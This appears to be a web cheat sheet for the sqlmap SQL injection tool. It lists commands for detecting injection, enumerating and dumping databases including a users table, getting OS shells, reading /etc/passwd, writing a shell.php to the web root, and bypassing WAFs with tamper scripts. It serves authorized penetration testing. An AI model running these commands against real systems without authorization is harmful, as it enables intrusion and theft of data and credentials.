SQLMap Quick Reference
Hackers Manifest - hackersmanifest.com
Automated SQL injection detection and exploitation tool reference.
🎯 Basic Usage
| Test GET param | sqlmap -u "URL?id=1" |
| Test POST data | sqlmap -u "URL" --data="user=x" |
| From Burp request | sqlmap -r request.txt |
| Specific param | sqlmap -u "URL" -p id |
| With cookie | sqlmap -u "URL" --cookie="SESS=x" |
| Custom header | sqlmap -u "URL" --headers="X-Token: x" |
| Through proxy | sqlmap -u "URL" --proxy=http://127.0.0.1:8080 |
| Random agent | sqlmap -u "URL" --random-agent |
🔍 Detection Options
| Level (1-5) | sqlmap -u "URL" --level=5 |
| Risk (1-3) | sqlmap -u "URL" --risk=3 |
| Full scan | --level=5 --risk=3 |
| Force DBMS | --dbms=mysql |
| Technique | --technique=BEUST |
| Time delay | --time-sec=5 |
| String match | --string="Welcome" |
Techniques: B=Boolean, E=Error, U=Union, S=Stacked, T=Time, Q=Inline
📊 Enumeration
| Banner | --banner |
| Current user | --current-user |
| Current DB | --current-db |
| Is DBA? | --is-dba |
| List databases | --dbs |
| List tables | -D dbname --tables |
| List columns | -D db -T table --columns |
| Dump table | -D db -T table --dump |
| Dump columns | -D db -T tbl -C col1,col2 --dump |
| Dump all | --dump-all |
| Row count | -D db -T table --count |
💻 OS Access
| OS shell | --os-shell |
| OS command | --os-cmd="whoami" |
| SQL shell | --sql-shell |
| Read file | --file-read="/etc/passwd" |
| Write file | --file-write="shell.php" --file-dest="/var/www/" |
| Registry read | --reg-read --reg-key="HKLM\..." |
🛡️ Bypass Techniques
| Tamper script | --tamper=space2comment |
| Multiple tampers | --tamper=between,randomcase |
| WAF bypass | --tamper=charencode |
| Hex encode | --hex |
| No casting | --no-cast |
| Skip URL encode | --skip-urlencode |
⚡ Performance
| Threads | --threads=10 |
| Delay | --delay=1 |
| Timeout | --timeout=30 |
| Retries | --retries=3 |
| Batch mode | --batch |
| Verbose | -v 3 |
| Output dir | --output-dir=/path/ |
🔧 Common Tamper Scripts
space2comment
space2plus
randomcase
between
charencode
equaltolike
base64encode
apostrophemask
🎯 Common Scan Profiles
Quick Test
sqlmap -u "URL?id=1" --batch
Full Enumeration
sqlmap -u "URL" --level=5 --risk=3 --dbs --batch
Dump Users Table
sqlmap -u "URL" -D db -T users --dump --batch
WAF Bypass
sqlmap -u "URL" --tamper=space2comment,between --random-agent
Generated from Hackers Manifest | For authorized security testing only | hackersmanifest.com